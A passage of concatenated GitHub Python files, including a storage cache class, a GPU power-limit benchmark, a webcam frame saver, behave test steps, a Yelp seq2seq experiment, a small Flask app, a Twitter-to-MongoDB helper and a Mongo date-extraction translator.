try:\n if not self.cache_enabled:\n raise KeyError\n alias = self._cache[resource_name] # raises KeyError\n try:\n data = self._local_storage.loadRessource(alias)\n except DownloadError:\n raise KeyError\n resource_hash = ResourceHash(hashlib.sha256(data).digest())\n try:\n meta_resource_hash = self._meta.getResourceByResourceName(resource_name).resource_hash\n except NotExistingException:\n meta_resource_hash = b''\n if resource_hash != meta_resource_hash:\n self._cache.pop(resource_name)\n self._cache_meta.removeAliasOfResourceName(resource_name)\n self._local_storage.deleteResource(alias)\n raise KeyError\n except KeyError:\n data = self.wrapped_storage.loadRessource(resource_name)\n if self.cache_enabled:\n resource_hash = ResourceHash(hashlib.sha256(data).digest())\n alias = ResourceNameAlias(\n self._local_storage.saveResource(data, resource_hash, ResourceSize(len(data))))\n self._cache[resource_name] = alias\n self._cache_meta.addAlias(resource_name, alias, resource_hash)\n return data\n\n def saveResource(self, resource_data, resource_hash, resource_size):\n resource_name = self.wrapped_storage.saveResource(resource_data, resource_hash, resource_size)\n if self.cache_enabled:\n alias = ResourceNameAlias(self._local_storage.saveResource(resource_data, resource_hash, resource_size))\n self._cache[resource_name] = alias\n self._cache_meta.addAlias(resource_name, alias, resource_hash)\n return resource_name\n\n def deleteResource(self, resource_name):\n try:\n if self._cache_meta.hasAliasForResourceName(resource_name):\n alias = self._cache_meta.getAliasOfResourceName(resource_name)\n self._local_storage.deleteResource(alias)\n self._cache_meta.removeAliasOfResourceName(resource_name)\n self._cache.pop(resource_name)\n else:\n alias = self._cache.pop(resource_name)\n self._local_storage.deleteResource(alias)\n except KeyError:\n pass\n self.wrapped_storage.deleteResource(resource_name)\n\n def listResourceNames(self):\n return self.wrapped_storage.listResourceNames()\n\n def wipeResources(self):\n self.wrapped_storage.wipeResources()\n\n\nclass SizableLocalCache(SizableStorageInterface, LocalCache):\n\n def __init__(self, meta, storage, cache_size=50, cache_dir='~/.isl/.isl_cache', ram_cache_meta=False, debug=False):\n # type: (MetaDBInterface, SizableStorageInterface, int, str, bool, bool) -> None\n LocalCache.__init__(self, meta, storage, cache_size, cache_dir, ram_cache_meta, debug)\n self._storage = cast(SizableStorageInterface, 
storage)\n\n def getTotalSize(self):\n return self._storage.getTotalSize()\n\n def getCurrentSize(self):\n return self._storage.getCurrentSize()\n\n def increaseCurrentSize(self, size):\n self._storage.increaseCurrentSize(size)\n\n def resetCurrentSize(self):\n self._storage.resetCurrentSize()\n\n def calculateFullness(self, default_total_size=None):\n return self._storage.calculateFullness(default_total_size)\n\n def hasFreeSize(self, required_space):\n return self._storage.hasFreeSize(required_space)\n","repo_name":"FlorianSauer/ImageSaver","sub_path":"ImageSaverLib/Storage/Cache/LocalCache/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3397993404","text":"import torch\n# torch.backends.cuda.matmul.allow_tf32 = True\nimport timm\nimport subprocess\n\nmodel = timm.create_model(\"vit_base_patch16_224\")\nmodel.head = torch.nn.Linear(768,1)\nbatch_size = 160\nmodel=model.to(\"cuda\") #.half()\n\ncriterion = torch.nn.BCEWithLogitsLoss()\nimages = torch.rand((batch_size,3,224,224)).to(\"cuda\") #.half()\noptimizer = torch.optim.AdamW(model.parameters(), lr=1e-5) \nfrom torch.cuda.amp import GradScaler\nfrom torch import autocast\nscaler = GradScaler()\n\nresults = []\nfor pwr in range(150,490,10):\n subprocess.run([\"nvidia-smi\",\"-pl\",str(pwr)])\n model.train()\n start = torch.cuda.Event(enable_timing=True)\n end = torch.cuda.Event(enable_timing=True)\n start.record()\n for _ in range(64):\n labels = torch.randint(0,2,(batch_size,1),dtype=torch.float32).to(\"cuda\")\n optimizer.zero_grad()\n with autocast(device_type='cuda', dtype=torch.float16):\n outputs = model.forward(images)\n loss = criterion(outputs,labels) \n\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n old_scale = scaler.get_scale()\n scaler.update()\n\n # outputs = model.forward(images)\n # loss = criterion(outputs,labels)\n # loss.backward()\n # optimizer.step()\n end.record()\n torch.cuda.synchronize()\n print((pwr,start.elapsed_time(end)/64))\n results.append((pwr,start.elapsed_time(end)/64))\nprint(results)","repo_name":"qwertyforce/optimal_power_limit_for_dl","sub_path":"test_power_train.py","file_name":"test_power_train.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1694225507","text":"import cv2\nimport threading\nimport requests\nimport os\n\nBACKEND_SERVER_ENDPOINT = \"http://127.0.0.1:5000\"\n\n\ndef processFrame(frame):\n _, img_encoded = cv2.imencode('.jpg', frame)\n # response = requests.post(f'{BACKEND_SERVER_ENDPOINT}/processImage',\n # files={'image': ('image.jpg', img_encoded.tobytes())})\n # print('Response:', response.status_code, response.content)\n\n\n# Define the video source for device 1\n# video_source_1 = \"http://192.168.45.45:8080/video\" # replace with ip web cam url\nvideo_source_1 = 0 # for accessing directly from webcam\n# video_source_2 = \"http://192.168.45.45:8080/video\" # another ip web cam url\n\n# Define the frame rate for both devices\n# I feel it's better to have different framerates depending on cameras. 
We can make it all same if that's easier tho\nframe_rate_1 = 30\nframe_rate_2 = 30\n\n# process/save every nth frame from video stream only instead of all frames\nframe_delimiter = 20\n\n# Initialize the variables for saving frames\ncounter = 0\n\n# Define the function to save frames from both devices\n\n\ndef save_frames(video_source, frame_rate):\n global counter\n\n # Create a VideoCapture object\n capture = cv2.VideoCapture(video_source)\n\n # Check if the video source is opened\n if not capture.isOpened():\n print(\"Unable to open the video source\")\n return\n\n # Read the first frame\n _, frame = capture.read()\n\n # Set the delay based on the frame rate\n delay = int(1000 / frame_rate)\n\n while True:\n # Read frames\n _, frame = capture.read()\n\n if frame is None:\n print(\"Error in reading frame correctly\")\n break\n\n # Increment the counter\n counter += 1\n\n # Save every 20th frame to file\n if counter % frame_delimiter == 0:\n # Save the frame to the \"images\" folder (for training phase)\n if not os.path.exists(\"images\"):\n os.makedirs(\"images\")\n cv2.imwrite(\"images/frame_{}.jpg\".format(counter //\n frame_delimiter), frame)\n print(\"Writing to file, frame: \", counter // frame_delimiter)\n processFrame(frame) # for testing phase\n\n # Show the live camera feed\n cv2.imshow('frame', frame)\n\n # Quit if the key \"q\" is pressed\n if cv2.waitKey(delay) & 0xFF == ord(\"q\"):\n break\n\n\n# Create and start the threads\nthreading.Thread(target=save_frames, args=(\n video_source_1, frame_rate_1)).start()\n# threading.Thread(target=save_frames, args=(video_source_2, frame_rate_2)).start() # start thread 2 once second camera source has been added\n\n# Wait for a key press to exit\ncv2.waitKey(0)\n\n# Clean up resources\ncv2.destroyAllWindows()\n","repo_name":"adithyaanilkumar/SafeNet","sub_path":"anomaly_server/temp/multiDevice.py","file_name":"multiDevice.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"74472733312","text":"import behave\nimport os\nimport json\nfrom docs_build.tutorials_templates.data_management.modalities.scripts import Scripts\n\n\n@behave.when(u'I prepared test modalities \"{section_name}\"')\ndef step_impl(context, section_name):\n sections_list = {\n \"section1\": section1_prepare,\n \"section2\": section2_prepare,\n # \"section3\": section3_prepare, NOT RUNNABLE\n \"section4\": section4_prepare,\n # \"section5\": section5_prepare, PREPARED FROM section4\n }\n\n context.scripts = Scripts()\n sections_list[section_name](context)\n\n\ndef section1_prepare(context):\n context.scripts.project_name1 = context.project.name\n context.scripts.dataset_name1 = context.dataset.name\n\n\ndef section2_prepare(context):\n item1_path = \"sample_datasets/FruitImage/items/train/apple_1.jpg\"\n item2_path = \"sample_datasets/FruitImage/items/train/apple_2.jpg\"\n item1 = context.dataset.items.upload(local_path=os.path.join(os.environ['DATALOOP_TEST_ASSETS'], item1_path))\n item2 = context.dataset.items.upload(local_path=os.path.join(os.environ['DATALOOP_TEST_ASSETS'], item2_path))\n context.scripts.first_item_id2 = item1.id\n context.scripts.second_item_id2 = item2.id\n context.scripts.dataset2 = context.dataset\n\n\ndef section4_prepare(context):\n context.scripts.dataset4 = context.dataset\n\n modalities_json_path = \"modalities/modalities_json.json\"\n context.scripts.modalities_json4 = os.path.join(os.environ['DATALOOP_TEST_ASSETS'], 
modalities_json_path)\n\n\n@behave.then(u'I run test modalities \"{section_name}\"')\ndef step_impl(context, section_name):\n sections_list = {\n 'section1': context.scripts.section1,\n 'section2': context.scripts.section2,\n # 'section3': context.scripts.section3, NOT RUNNABLE\n 'section4': context.scripts.section4,\n 'section5': context.scripts.section5,\n }\n\n try:\n sections_list[section_name]()\n\n except Exception as e:\n assert False, \"Failed to run example : {}\".format(e)\n\n if section_name == 'section4':\n try:\n sections_list['section5']()\n except Exception as e:\n assert False, \"Failed to run example : {}\".format(e)\n\n\n","repo_name":"dataloop-ai/dtlpy-documentation","sub_path":"tests/features/steps/tutorials/data_management/test_modalities.py","file_name":"test_modalities.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"3175056899","text":"from neighbors_and_roc.options import Data_Defaults, Model_Defaults\nfrom neighbors_and_roc import util_ROC, fixed_settings, util_text, util_emb, my_models\n\nimport random\nimport json\nimport os\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.utils import to_categorical\nimport numpy as np\n\n# OPTIONS\nTO_WRITE = os.path.join(fixed_settings.GENERATED_DATA_ROOT, 'generation_yelplike.txt')\ndata_opts = Data_Defaults()\ndata_opts.NUM_STORIES = 10000\nprint(data_opts, \"\\n\")\nmodel_opts = Model_Defaults()\nmodel_opts.EMBEDDINGS_FILENAME = 'GoogleNews-vectors-negative300.txt'\nmodel_opts.EMBEDDINGS_FILEPATH = os.path.join(fixed_settings.EMBEDDINGS_ROOT, model_opts.EMBEDDINGS_FILENAME) if model_opts.EMBEDDINGS_FILENAME != None else None\nmodel_opts.HIDDEN_LAYERS = [100]\n# self.BATCH_SIZE = 32\nmodel_opts.EPOCHS = 100\nmodel_opts.DROPOUT = False\nmodel_opts.REGULARIZE = False\nmodel_opts.BASE_NUM_TRAINING_SAMPLES = 5000\nmodel_opts.PERCENTAGE_TO_ADD = 0\nmodel_opts.NUM_TESTING_SAMPLES = 500\n# model_opts.USING_ALTERNATIVES = True\n# model_opts = Model_Defaults() # For quick debugging only\nprint(model_opts, \"\\n\")\nassert(data_opts.NUM_STORIES >\n model_opts.BASE_NUM_TRAINING_SAMPLES + model_opts.PERCENTAGE_TO_ADD*model_opts.BASE_NUM_TRAINING_SAMPLES + model_opts.NUM_TESTING_SAMPLES)\n\n\n# DATA\nwith open(os.path.join(fixed_settings.DATA_ROOT,'yelp-10000.json'), 'r') as file:\n reviews = [json.loads(line) for line in file]\nstars_to_simple_responses = {}\nstars_to_simple_responses[5]=['I am impressed!', 'I will be back.']\nstars_to_simple_responses[4]=['I am impressed!', 'I will be back.']\nstars_to_simple_responses[2]=['Not impressed.', 'Will not be back.']\nstars_to_simple_responses[1]=['Not impressed.', 'Will not be back.']\nX_sentences = []\nY_sentences = []\nY_alternative_sentences = []\nfor review in reviews:\n curr_sentences = util_text.get_sentences(review['text'])\n sentence = curr_sentences[min(1, len(curr_sentences) - 1)]\n sentence = ' '.join(sentence.split())\n stars = review['stars']\n if sentence is not '' and stars in stars_to_simple_responses:\n X_sentences.append(sentence)\n r = random.randint(0,1)\n Y_sentences.append(stars_to_simple_responses[stars][r])\n Y_alternative_sentences.append(stars_to_simple_responses[stars][1-r])\nprint('\\n\\n'.join(['\\n'.join(t) for t in zip(X_sentences, Y_sentences, Y_alternative_sentences)]), file=open(TO_WRITE, 'w'))\n#region data preparation\n# prepare the tokenizer on the source text #TODO see what can be 
moved out of this file\nin_tokenizer = Tokenizer()\nin_tokenizer.fit_on_texts(X_sentences)\nin_index_to_word = {index: word for (word, index) in in_tokenizer.word_index.items()}\n# determine the vocabulary size\nin_vocab_size = len(in_tokenizer.word_index) + 1 # Because tokenizer does not assign 0\nprint('Vocabulary Size: %d' % in_vocab_size)\n# Convert from text to sequences\nin_sequences = in_tokenizer.texts_to_sequences(X_sentences)\n# pad input sequences\nin_max_sentence_length = max([len(seq) for seq in in_sequences])\nin_sequences = pad_sequences(in_sequences, maxlen=in_max_sentence_length, padding='pre')\nprint('Max Sequence Length: %d' % in_max_sentence_length)\n# split into input and output elements\n\n# prepare the tokenizer on the source text #TODO see what can be moved out of this file\nout_tokenizer = Tokenizer()\nout_tokenizer.fit_on_texts(Y_sentences+Y_alternative_sentences)\nout_index_to_word = {index: word for (word, index) in out_tokenizer.word_index.items()}\n# determine the vocabulary size\nout_vocab_size = len(out_tokenizer.word_index) + 1 # Because tokenizer does not assign 0\nprint('Vocabulary Size: %d' % out_vocab_size)\n# Convert from text to sequences\nY_sequences = out_tokenizer.texts_to_sequences(Y_sentences)\nY_alternative_sequences = out_tokenizer.texts_to_sequences(Y_alternative_sentences)\n# pad input sequences\nout_max_sentence_length = max([len(seq) for seq in Y_sequences]+[len(seq) for seq in Y_alternative_sequences])\nY_sequences = pad_sequences(Y_sequences, maxlen=out_max_sentence_length, padding='post')\nY_alternative_sequences = pad_sequences(Y_alternative_sequences, maxlen=out_max_sentence_length, padding='post')\nprint('Max Sequence Length: %d' % out_max_sentence_length)\n\n\ndata = np.hstack((in_sequences[:, :], Y_sequences[:, :], Y_alternative_sequences[:,:]))\n# x y1 y2\n# x y1 y2\n# ...\n# np.random.shuffle(data)\n\nX = data[:,:-2*out_max_sentence_length]\nY = data[:,-2*out_max_sentence_length:-1*out_max_sentence_length]\nY_alternatives = data[:,-1*out_max_sentence_length:]\nprint(X.shape)\n# print([[in_index_to_word[i] for i in row if i!=0] for row in X]) # HELPFUL FOR DEBUGGING\n#endregion\nbasic_training_data = (X[:model_opts.BASE_NUM_TRAINING_SAMPLES],\n Y[:model_opts.BASE_NUM_TRAINING_SAMPLES])\nNUM_SAMPLES_TO_ADD = int(model_opts.BASE_NUM_TRAINING_SAMPLES * model_opts.PERCENTAGE_TO_ADD)\nfresh_training_data = (X[model_opts.BASE_NUM_TRAINING_SAMPLES:model_opts.BASE_NUM_TRAINING_SAMPLES + NUM_SAMPLES_TO_ADD],\n Y[model_opts.BASE_NUM_TRAINING_SAMPLES:model_opts.BASE_NUM_TRAINING_SAMPLES + NUM_SAMPLES_TO_ADD])\nalternative_training_data = (X[:NUM_SAMPLES_TO_ADD],\n Y_alternatives[:NUM_SAMPLES_TO_ADD])\ntesting_data = (X[len(X) - model_opts.NUM_TESTING_SAMPLES:],\n Y[len(X) - model_opts.NUM_TESTING_SAMPLES:] + Y_alternatives[len(X) - model_opts.NUM_TESTING_SAMPLES:])\n\n\n# GET EMBEDDINGS\nif model_opts.EMBEDDINGS_FILENAME:\n print(\"Retrieving embeddings...\")\n in_embedding_matrix = util_emb.get_embedding_matrix(\n embedding_size=model_opts.EMBEDDING_SIZE, embedding_path=model_opts.EMBEDDINGS_FILEPATH, vocab_size=in_vocab_size, word_to_index=in_tokenizer.word_index)\n out_embedding_matrix = util_emb.get_embedding_matrix(\n embedding_size=model_opts.EMBEDDING_SIZE, embedding_path=model_opts.EMBEDDINGS_FILEPATH, vocab_size=out_vocab_size, word_to_index=out_tokenizer.word_index)\n\n# TRAIN WITH DATA ADDED\nadditional_training_data = alternative_training_data if model_opts.USING_ALTERNATIVES else fresh_training_data\nprint(\"Building 
model...\")\nif model_opts.EMBEDDINGS_FILENAME:\n training_model,encoder_model,decoder_model = my_models.seq2seq_model_with_embs(input_length=X.shape[1], output_length=Y.shape[1],\n in_embedding_matrix=in_embedding_matrix, out_embedding_matrix=out_embedding_matrix,\n hidden_layers=model_opts.HIDDEN_LAYERS, dropout=model_opts.DROPOUT, regularize=model_opts.REGULARIZE)\nelse: # Random embedding, mostly for debugging\n training_model, encoder_model, decoder_model = my_models.seq2seq_model_with_embs(input_length=X.shape[1], output_length=Y.shape[1],\n in_embedding_matrix_shape=(in_vocab_size, model_opts.EMBEDDING_SIZE),\n out_embedding_matrix_shape=(out_vocab_size, model_opts.EMBEDDING_SIZE),\n hidden_layers=model_opts.HIDDEN_LAYERS, dropout=model_opts.DROPOUT, regularize=model_opts.REGULARIZE)\ntraining_model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nprint(\"Training model...\")\nencoder_input_data = np.vstack((basic_training_data[0], additional_training_data[0]))\ndecoder_target_data = np.vstack((basic_training_data[1], additional_training_data[1]))\ntab = np.asarray([0]*decoder_target_data.shape[0]).reshape(decoder_target_data.shape[0],1)\ndecoder_input_data = np.hstack((tab, decoder_target_data[:,:-1])) # Target data slid over\ntraining_model.fit([encoder_input_data, decoder_input_data], to_categorical(decoder_target_data),\n epochs=model_opts.EPOCHS, batch_size=model_opts.BATCH_SIZE, verbose=2)\nprint(\"Evaluating model...\")\n# Note that model.evaluate() is intentionally not used here because it will only mark 1 (the first) of the 2 valid answers correct\nnum_correct = 0\nfor i in range(model_opts.NUM_TESTING_SAMPLES):\n x,y = testing_data[0][i,:].reshape((1,testing_data[0].shape[1])), testing_data[1][i,:].reshape((1,testing_data[1].shape[1]))\n generated = my_models.decode_sequence(x, Y.shape[1], encoder_model, decoder_model, out_tokenizer.word_index, out_index_to_word)\n print(generated)\n# prediction = model.predict_classes(x)[0]\n# if y[0,prediction] == 1: print('\\nCorrect:'); num_correct += 1\n# else: print('\\nWrong')\n# choice_num = 0\n# for start in range(0,x.shape[1],max_sentence_length):\n# predicted_flag = ''\n# gold_star_flag = ''\n# if start != 0:\n# if choice_num == prediction: predicted_flag = '>'\n# if y[0,choice_num] == 1: gold_star_flag = '*'\n# choice_num += 1\n# print(gold_star_flag+predicted_flag+\n# ' '.join([index_to_word[i] for i in x[0,start:start+max_sentence_length] if i!=0])) # HELPFUL FOR DEBUGGING\n# print('\\n{correct}/{all}={perc:.2%}'.format(correct=num_correct, all=model_opts.NUM_TESTING_SAMPLES,\n# perc=num_correct/model_opts.NUM_TESTING_SAMPLES))\n\n","repo_name":"pkalluri/neighbors-and-roc","sub_path":"scripts/generation_yelplike_dataset_learn.py","file_name":"generation_yelplike_dataset_learn.py","file_ext":"py","file_size_in_byte":9365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"26806400238","text":"\nfrom flask import Flask, render_template\nimport psycopg2\n\napp=Flask(__name__)\ntry:\n conn = psycopg2.connect(\"dbname='myduka' user='postgres' host='localhost'port='5433' password='12345'\")\n print(\"Database Connected Successfully\")\nexcept Exception as e:\n print (\"I am unable to connect to the database\", e)\n\n@app.route(\"/\")\ndef home():\n username = \"VIVI K\"\n return render_template(\"index.html\", username=username)\n\n@app.route(\"/products\")\ndef products():\n\n products = [\n (1,\"omo\",40,50,100),\n 
(2,\"bread\",50,60,200),\n (3,\"milk\",60,65,150)\n \n ]\ncur = conn.cursor()\ncur.execute(\"\"\"my-duka\"\"\")\nrows = cur.fetchall()\nprint(rows)\n\n\n #\n #for i in products:\n #total = total + i[3]\n\n # return render_template(\"products.html\", products=products)\napp.run()\n","repo_name":"VIVIAN-WANJIRU/my-duka-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24813379394","text":"from progress.bar import IncrementalBar\nfrom pymongo import MongoClient\nimport os, json, re, html, time\nimport pycountry, pickle, datetime\nimport yaml\n\ndictfilt = lambda x, y: dict([ (i,x[i]) for i in x if i in set(y) ])\naddtabs = lambda table, count=1: '\\n'+'\\n'.join(['\\t'*count+line for line in table.split('\\n')])+'\\n'\ndef search(keyword):\n res = []\n #find in dbs:\n objs = json.loads(get_all_dbs())\n for obj in objs:\n if obj['ready']==True:\n for k,v in obj.items():\n if type(v)==str and v.lower().find(keyword.lower())>=0:\n res.append({ 'title': v,\n 'desc' : 'A match found for '+k+' in the databases.',\n 'link' : '/output/'+obj['dbname']+'/'+obj['dbname']+'_report.pdf'\n })\n break\n #find in about, documentation, dissertation\n f = open('./config/metadata.json','r')\n mydict = json.loads(f.read())\n f.close()\n for k, v in mydict.items():\n for key in v[0]:\n if key.find(keyword.lower())>=0:\n res.append({ 'title': key,\n 'desc' : 'A match found for in '+k+' section for the search.',\n 'link' : v[1] })\n break\n return json.dumps(res)\n\ndef get_all_dbs():\n dbpath = './data/pickle/'\n res = []\n for root, dirs, files in os.walk(dbpath):\n for adir in dirs:\n with open(os.path.join(root,adir,'input.in')) as f:\n params = f.read().splitlines()\n obj = { 'country' : params[5],\n 'keyword1' : params[0],\n 'keyword2' : params[1],\n 'fromDate' : params[2],\n 'toDate' : params[3],\n 'dbname' : params[4],\n 'ready' : os.path.exists('./app/output/'+params[4]+'/'+params[4]+'_report.pdf') }\n res.append(obj)\n return json.dumps(res)\n\n#Remove those from the formula which is not in dataframe columns\ndef removeUnwanted(formula, columns):\n y = formula[:formula.find('~')].rstrip().lstrip()\n X = formula[formula.find('~')+1:].rstrip().lstrip()\n X = [o.rstrip().lstrip() for l in X.split('+') for m in l.split(':') for o in m.split('*')]\n for col in X:\n if col not in columns:\n formula = formula.replace(col,'')\n while formula.find(' ')!=-1 or formula.find('++')!=-1 or \\\n formula.find('**')!=-1 or formula.find('::')!=-1 or \\\n formula.find('+:')!=-1 or formula.find(':+')!=-1 or \\\n formula.find('+*')!=-1 or formula.find('*+')!=-1:\n formula = formula.replace(' ','')\n formula = formula.replace('++','+')\n formula = formula.replace('**','*')\n formula = formula.replace('::',':')\n formula = formula.replace('+:','+')\n formula = formula.replace(':+','+')\n formula = formula.replace('+*','+')\n formula = formula.replace('*+','+')\n if formula[-1]==':' or formula[-1]=='*' or formula[-1]=='+':\n formula = formula[:-1]\n formula = formula.replace('+',' + ')\n formula = formula.replace('~',' ~ ')\n return formula\n# get the dictionary of predictors map\ndef getPreDict(xcols):\n pdict = {}\n for col in xcols:\n lookfor = '[T.' 
if col.find('[T.')!=-1 else '['\n if col.find(lookfor)!=-1 and col.find(':')==-1 and col.find('*')==-1:\n key = col[:col.find(lookfor)]\n if key in pdict.keys():\n pdict[key].append(col[col.find(lookfor)+len(lookfor):-1])\n else:\n pdict[key] = [col[col.find(lookfor)+len(lookfor):-1]]\n else:\n pdict[col] = []\n return pdict\n# get Reference variable from the given formula\ndef getRefDict(xcols, df):\n pdict = getPreDict(xcols)\n refdict = {}\n for col in pdict.keys():\n if pdict[col]!=[]:\n refdict[col] = str(list(set(df[col].values)-set(pdict[col]))[0])\n return refdict\n# prettyjoin\ndef prettyjoin(xcols, dfcols):\n pdict = getPreDict(xcols)\n mainstr = ''\n i = 1\n for col in pdict.keys():\n sep = ''\n if i==len(pdict.keys())-1:\n sep = ' and, '\n elif i!=len(pdict.keys()):\n sep = ', '\n if len(pdict[col])==0:\n mainstr += col + sep\n elif len(pdict[col])==1:\n mainstr += col + ' - ' + pdict[col][0] + sep\n else:\n mainstr += col + ' - ' + ', '.join(pdict[col][:len(pdict[col])-1]) + ' and, ' + pdict[col][-1] + sep\n i += 1\n return mainstr\n# get all countires, its code and its subdivisions\ndef get_all_countries():\n countries = {}\n for c in list(pycountry.countries):\n try:\n subs = []\n for sub in list(pycountry.subdivisions.get(country_code=c.alpha2)):\n for name in sub.name.split(';'):\n for n in name.split(','):\n subs.append(n)\n countries[c.name] = {'name': c.name, 'code': c.alpha2, 'subdivisions': list(set(subs))}\n except Exception as e:\n pass\n return countries\n\ndef containsAny(keywords, text):\n flag = False\n for keyword in keywords.split(' '):\n if text.lower().find(keyword.lower())>-1:\n flag = True\n return flag\n\ndef clean(text):\n text = re.sub(r'[^a-zA-Z0-9 \\'\\:\\,\\-\\.\\!\\_\\(\\)\\?\\\"\\;\\/\\\\\\#\\@]+', '', text)\n text = text.replace(' ',' ')\n text = text.rstrip().lstrip()\n return text\n\ndef reverse_map(mydict):\n values = [value for key in mydict.keys() for value in mydict[key]]\n values = list(set(values))\n newdict = {}\n for value in values:\n if value not in newdict.keys():\n newdict[value] = [key for key in mydict.keys() if value in mydict[key]]\n return newdict\n\ndef get_variables(path):\n f = open(path)\n var = yaml.load(f)\n return var\n\ndef wait_to_recover(func):\n def wrapper(*args, **kargs):\n result = None\n try:\n result = func(*args, **kargs)\n except Exception as e:\n # print('\\nError: ', e)\n time.sleep(120)\n return result\n return wrapper\n\n@wait_to_recover\ndef find_place_ids(api, country_code, subdivision):\n res = api.geo_search(query=subdivision, granularity='city')\n place_ids = []\n for place in res:\n if place.country_code==country_code and place.id not in place_ids:\n place_ids.append(place.id)\n return place_ids\n\ndef download_place_ids(api, country):\n bar = IncrementalBar('Downloading ', max=len(country['subdivisions']))\n places = {}\n i = 0\n while i0 else ''\n source = re.sub('<[A-Za-z\\/][^>]*>','', status.source)\n dt = status.created_at.strftime('%a %b %d %H:%M:%S %Y')\n dt = datetime.datetime.strptime(dt,'%a %b %d %H:%M:%S %Y')\n # print('status',i,'and user',status.user.id_str)\n # print((since-until).days, (since-dt).days, (until-dt).days, containsAny(data['keyword'], text))\n if dt>until and until>since and containsAny(data['keyword'], text):\n statuses['timeline'].append({# ----------- Tweet Info ----------\n 'tweet_id' : status.id,\n 'created_at' : status.created_at,\n 'lang' : status.lang,\n 'retweeted' : status.retweeted,\n 'text' : text,\n 'links' : url,\n 'retweet_count' : status.retweet_count,\n # 
--------- Author Info ----------\n 'author_id' : status.author.id_str,\n 'author_screen_name': status.author.screen_name,\n # --------- Source Info ----------\n 'source' : source\n })\n if i==0:\n statuses['user'] = { # --------- User Info -----------\n 'user_id' : status.user.id_str,\n 'name' : status.user.name,\n 'screen_name' : status.user.screen_name,\n 'user_created_at' : status.user.created_at,\n 'description' : status.user.description,\n 'friends_count' : status.user.friends_count,\n 'statuses_count' : status.user.statuses_count,\n 'followers_count' : status.user.followers_count,\n 'favourites_count' : status.user.favourites_count,\n 'contributors_enabled' : status.user.contributors_enabled,\n # ----------- Place Info -----------\n 'place_id' : data['place_id'],\n 'subdivision' : data['subdivision'],\n 'location' : status.user.location\n }\n i+=1\n # --- end of for loop ---\n if len(statuses['timeline'])!=0 and statuses['user']!=None:\n f = open(data['path']+'/@'+data['id']+'.pkl', 'wb')\n pickle.dump(statuses, f)\n f.close()\n return True\n else:\n return False\n\ndef save_data_to_mongoDB(port_number, DBName, dirpath, user_ids):\n bar = IncrementalBar('Processing ', max=len(user_ids))\n client = MongoClient(port=port_number)\n db = client[DBName]\n db.metadata.insert({'source': 'downloader'})\n for user_id in user_ids:\n filename = dirpath+'/@' + user_id + '.pkl'\n if os.path.exists(filename) and os.path.isfile(filename):\n f = open(filename, 'rb')\n statuses = pickle.load(f)\n f.close()\n db.users.insert(statuses['user'])\n for post in statuses['timeline']:\n post['user_id'] = statuses['user']['user_id'] # add foreign key !!!\n db.tweets.insert(post)\n bar.next()\n return None\n","repo_name":"praveer-k/campaign-monitor","sub_path":"lib/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":12561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12813273096","text":"from weaverbird.backends.mongo_translator.steps.types import MongoStep\nfrom weaverbird.pipeline.steps import DateExtractStep\n\n\ndef _truncate_date_to_day(expr: dict | str) -> MongoStep:\n return {\n \"$dateTrunc\": {\n \"unit\": \"day\",\n \"date\": expr,\n },\n }\n\n\ndef _extract_quarter(step: DateExtractStep) -> MongoStep:\n return {\n \"$switch\": {\n \"branches\": [\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 1]}, \"then\": 1},\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 2]}, \"then\": 2},\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 3]}, \"then\": 3},\n ],\n \"default\": 4,\n },\n }\n\n\ndef _extract_first_day_of_year(step: DateExtractStep) -> MongoStep:\n return {\n \"$dateFromParts\": {\"year\": {\"$year\": f\"${step.column}\"}, \"month\": 1, \"day\": 1},\n }\n\n\ndef _extract_first_day_of_month(step: DateExtractStep) -> MongoStep:\n return {\n \"$dateFromParts\": {\n \"year\": {\"$year\": f\"${step.column}\"},\n \"month\": {\"$month\": f\"${step.column}\"},\n \"day\": 1,\n },\n }\n\n\ndef _extract_first_day_of_week(step: DateExtractStep) -> MongoStep:\n return _truncate_date_to_day(\n {\n # We subtract to the target date a number of days corresponding to (dayOfWeek - 1)\n \"$subtract\": [\n f\"${step.column}\",\n {\n \"$multiply\": [\n {\"$subtract\": [{\"$dayOfWeek\": f\"${step.column}\"}, 1]},\n 24 * 60 * 60 * 1000,\n ],\n },\n ],\n }\n )\n\n\ndef _extract_first_day_of_quarter(step: DateExtractStep) -> MongoStep:\n return {\n 
